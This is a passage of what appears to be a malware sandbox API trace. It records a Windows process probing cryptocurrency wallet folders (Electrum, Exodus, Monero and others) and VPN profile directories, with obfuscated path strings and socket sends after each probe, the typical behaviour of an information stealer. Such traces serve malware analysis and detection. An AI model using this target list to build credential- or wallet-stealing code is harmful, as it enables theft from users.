lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi", lpFilePart=0x0) returned 0x2a [0209.022] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi\\*", lpFindFileData=0x38ee48 | out: lpFindFileData=0x38ee48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0209.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee08) returned 1 [0209.024] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0209.024] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Electrum\\wallets", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets") returned 0x34 [0209.024] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets", nBufferLength=0x105, lpBuffer=0x38ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets", lpFilePart=0x0) returned 0x33 [0209.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f098) returned 1 [0209.024] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets", nBufferLength=0x105, lpBuffer=0x38eb78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets", lpFilePart=0x0) returned 0x33 [0209.024] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets\\*", lpFindFileData=0x38ee48 | out: lpFindFileData=0x38ee48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0209.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee08) returned 1 [0209.026] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0209.026] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Ethereum\\wallets", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets") returned 0x34 [0209.026] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets", nBufferLength=0x105, lpBuffer=0x38ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets", lpFilePart=0x0) returned 0x33 [0209.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f098) returned 1 [0209.026] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets", nBufferLength=0x105, lpBuffer=0x38eb78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets", lpFilePart=0x0) returned 0x33 [0209.027] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets\\*", lpFindFileData=0x38ee48 | out: lpFindFileData=0x38ee48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0209.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee08) returned 1 [0209.029] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0209.029] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Exodus\\exodus.wallet", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet") returned 0x38 [0209.029] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet", nBufferLength=0x105, lpBuffer=0x38ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet", lpFilePart=0x0) returned 0x37 [0209.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f098) returned 1 [0209.029] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet", nBufferLength=0x105, lpBuffer=0x38eb78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet", lpFilePart=0x0) returned 0x37 [0209.029] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet\\*", lpFindFileData=0x38ee48 | out: lpFindFileData=0x38ee48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0209.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee08) returned 1 [0209.031] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0209.031] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Exodus", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus") returned 0x2a [0209.031] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus", nBufferLength=0x105, lpBuffer=0x38ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus", lpFilePart=0x0) returned 0x29 [0209.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f098) returned 1 [0209.031] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus", nBufferLength=0x105, lpBuffer=0x38eb78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus", lpFilePart=0x0) returned 0x29 [0209.032] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\*.json", lpFindFileData=0x38ee48 | out: lpFindFileData=0x38ee48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0209.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee08) returned 1 [0209.033] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0209.033] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Guarda", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda") returned 0x2a [0209.034] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda", nBufferLength=0x105, lpBuffer=0x38ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda", lpFilePart=0x0) returned 0x29 [0209.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f098) returned 1 [0209.034] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda", nBufferLength=0x105, lpBuffer=0x38eb78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda", lpFilePart=0x0) returned 0x29 [0209.034] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda\\*", lpFindFileData=0x38ee48 | out: lpFindFileData=0x38ee48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0209.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee08) returned 1 [0209.067] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0209.067] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\com.liberty.jaxx", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx") returned 0x34 [0209.067] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx", nBufferLength=0x105, lpBuffer=0x38ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx", lpFilePart=0x0) returned 0x33 [0209.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f098) returned 1 [0209.067] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx", nBufferLength=0x105, lpBuffer=0x38eb78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx", lpFilePart=0x0) returned 0x33 [0209.067] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx\\*", lpFindFileData=0x38ee48 | out: lpFindFileData=0x38ee48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0209.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee08) returned 1 [0209.070] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0209.070] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\Documents\\Monero\\wallets", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets") returned 0x2c [0209.070] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets", nBufferLength=0x105, lpBuffer=0x38ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets", lpFilePart=0x0) returned 0x2b [0209.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f098) returned 1 [0209.070] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets", nBufferLength=0x105, lpBuffer=0x38eb78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets", lpFilePart=0x0) returned 0x2b [0209.070] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets\\*", lpFindFileData=0x38ee48 | out: lpFindFileData=0x38ee48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0209.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee08) returned 1 [0209.077] CoCreateGuid (in: pguid=0x38edc4 | out: pguid=0x38edc4*(Data1=0xb5545633, Data2=0x8ac9, Data3=0x4d29, Data4=([0]=0xbc, [1]=0xc0, [2]=0xa3, [3]=0xba, [4]=0x42, [5]=0xb0, [6]=0xf0, [7]=0x40))) returned 0x0 [0209.077] CoCreateGuid (in: pguid=0x38ed08 | out: pguid=0x38ed08*(Data1=0xa4eaf08f, Data2=0xcd0c, Data3=0x475e, Data4=([0]=0xa7, [1]=0x16, [2]=0x21, [3]=0x4c, [4]=0x44, [5]=0xe5, [6]=0xb7, [7]=0xf3))) returned 0x0 [0209.079] send (s=0x268, buf=0x38d1587*, len=174, flags=0) returned 174 [0209.080] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 128 [0210.035] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef9c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0210.036] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local", lpDst=0x38ef9c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x21 [0210.036] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NordVPN", nBufferLength=0x105, lpBuffer=0x38ebc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\NordVPN", lpFilePart=0x0) returned 0x28 [0210.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ee34) returned 1 [0210.036] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NordVPN" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\nordvpn"), fInfoLevelId=0x0, lpFileInformation=0x2670aa8 | out: lpFileInformation=0x2670aa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0210.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee30) returned 1 [0210.039] CoCreateGuid (in: pguid=0x38edcc | out: pguid=0x38edcc*(Data1=0x9b0920bd, Data2=0x66c5, Data3=0x447c, Data4=([0]=0xaa, [1]=0xa3, [2]=0x43, [3]=0x19, [4]=0xaa, [5]=0x83, [6]=0x13, [7]=0x92))) returned 0x0 [0210.039] CoCreateGuid (in: pguid=0x38ed10 | out: pguid=0x38ed10*(Data1=0x2657decc, Data2=0xc4c3, Data3=0x407b, Data4=([0]=0x80, [1]=0x14, [2]=0x41, [3]=0x27, [4]=0x67, [5]=0x38, [6]=0x7e, [7]=0x32))) returned 0x0 [0210.039] send (s=0x268, buf=0x38d1587*, len=178, flags=0) returned 178 [0210.040] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 128 [0210.130] ExpandEnvironmentStringsW (in: lpSrc="%USERPFile.WriteROFILE%", lpDst=0x38ef70, nSize=0x64 | out: lpDst="%USERPFile.WriteROFILE%") returned 0x18 [0210.130] ExpandEnvironmentStringsW (in: lpSrc="%USERPFile.WriteROFILE%\\AppFile.WriteData\\RoamiFile.Writeng", lpDst=0x38ef70, nSize=0x64 | out: lpDst="%USERPFile.WriteROFILE%\\AppFile.WriteData\\RoamiFile.Writeng") returned 0x3c [0210.453] GetFullPathNameW (in: lpFileName="%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", nBufferLength=0x105, lpBuffer=0x38ebcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", lpFilePart=0x0) returned 0x5b [0210.454] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", lpszLongPath=0x38ebb8, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0210.460] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect", lpszLongPath=0x38eb80, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0210.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f09c) returned 1 [0210.461] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x38eb68, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13 [0210.462] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", nBufferLength=0x105, lpBuffer=0x38eb7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", lpFilePart=0x0) returned 0x5c [0210.462] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles\\*ovpn", lpFindFileData=0x38ee4c | out: lpFindFileData=0x38ee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0210.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee0c) returned 1 [0210.468] CoCreateGuid (in: pguid=0x38edcc | out: pguid=0x38edcc*(Data1=0xa67b0c1d, Data2=0x5670, Data3=0x4f39, Data4=([0]=0xbf, [1]=0x62, [2]=0x12, [3]=0xec, [4]=0x11, [5]=0x34, [6]=0xb7, [7]=0x2f))) returned 0x0 [0210.468] CoCreateGuid (in: pguid=0x38ed10 | out: pguid=0x38ed10*(Data1=0xddd643f3, Data2=0x73ae, Data3=0x4313, Data4=([0]=0x8c, [1]=0xa5, [2]=0xb1, [3]=0xf, [4]=0x78, [5]=0xca, [6]=0xb2, [7]=0xd9))) returned 0x0 [0210.468] send (s=0x268, buf=0x38d1587*, len=167, flags=0) returned 167 [0210.469] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 128 [0210.518] ExpandEnvironmentStringsW (in: lpSrc="%USERPserviceInterface.ExtensionROFILE%", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="%USERPserviceInterface.ExtensionROFILE%") returned 0x28 [0210.519] ExpandEnvironmentStringsW (in: lpSrc="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Extensionl", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Exte8갢") returned 0x6a [0210.519] ExpandEnvironmentStringsW (in: lpSrc="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Extensionl", lpDst=0x38ef70, nSize=0x6a | out: lpDst="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Extensionl") returned 0x6a [0210.520] GetFullPathNameW (in: lpFileName="%USERPROFILE%\\AppData\\Local\\ProtonVPN", nBufferLength=0x105, lpBuffer=0x38ebcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", lpFilePart=0x0) returned 0x4a [0210.520] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", lpszLongPath=0x38ebb8, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0210.520] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local", lpszLongPath=0x38eb7c, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0210.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f09c) returned 1 [0210.520] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x38eb68, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13 [0210.521] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", nBufferLength=0x105, lpBuffer=0x38eb7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", lpFilePart=0x0) returned 0x4b [0210.521] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN\\*ovpn", lpFindFileData=0x38ee4c | out: lpFindFileData=0x38ee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0210.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee0c) returned 1 [0210.528] CoCreateGuid (in: pguid=0x38edcc | out: pguid=0x38edcc*(Data1=0x6aa56883, Data2=0xabb7, Data3=0x4fc0, Data4=([0]=0x86, [1]=0xbd, [2]=0xca, [3]=0xe8, [4]=0xd2, [5]=0x62, [6]=0xec, [7]=0x1))) returned 0x0 [0210.528] CoCreateGuid (in: pguid=0x38ed10 | out: pguid=0x38ed10*(Data1=0xf3eda404, Data2=0x727e, Data3=0x499b, Data4=([0]=0x90, [1]=0x89, [2]=0xad, [3]=0xa5, [4]=0x3a, [5]=0x17, [6]=0xcd, [7]=0x56))) returned 0x0 [0210.528] send (s=0x268, buf=0x38d1587*, len=167, flags=0) returned 167 [0210.529] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 128 [0211.068] GetCurrentProcessId () returned 0xf1c [0211.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3ad15a0, Length=0x20000, ResultLength=0x38f020 | out: SystemInformation=0x3ad15a0, ResultLength=0x38f020*=0xca18) returned 0x0 [0211.088] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f00c | out: puCount=0x38f00c*=0x2) returned 0x0 [0211.088] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f008*=0x0, pszText=0x0 | out: puBuffLength=0x38f008*=0xf, pszText=0x0) returned 0x0 [0211.088] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f008*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f008*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.089] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38ef94 | out: ppv=0x38ef94*=0x6d0cac) returned 0x0 [0211.089] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38ef8c | out: pAptType=0x38ef8c*=1) returned 0x0 [0211.089] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38ef90 | out: ppvObject=0x38ef90*=0x0) returned 0x80004002 [0211.089] IUnknown:Release (This=0x6d0cac) returned 0x0 [0211.091] CoGetClassObject (in: rclsid=0x55b3f8c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38ebb0 | out: ppv=0x38ebb0*=0x55edbb0) returned 0x0 [0211.092] WbemLocator:IUnknown:QueryInterface (in: This=0x55edbb0, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38edc8 | out: ppvObject=0x38edc8*=0x0) returned 0x80004002 [0211.092] WbemLocator:IClassFactory:CreateInstance (in: This=0x55edbb0, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edd4 | out: ppvObject=0x38edd4*=0x55ed408) returned 0x0 [0211.092] WbemLocator:IUnknown:Release (This=0x55edbb0) returned 0x0 [0211.092] WbemLocator:IUnknown:QueryInterface (in: This=0x55ed408, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e9f4 | out: ppvObject=0x38e9f4*=0x55ed408) returned 0x0 [0211.092] WbemLocator:IUnknown:QueryInterface (in: This=0x55ed408, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e9a8 | out: ppvObject=0x38e9a8*=0x0) returned 0x80004002 [0211.093] WbemLocator:IUnknown:AddRef (This=0x55ed408) returned 0x3 [0211.093] WbemLocator:IUnknown:QueryInterface (in: This=0x55ed408, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e304 | out: ppvObject=0x38e304*=0x0) returned 0x80004002 [0211.093] WbemLocator:IUnknown:QueryInterface (in: This=0x55ed408, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, 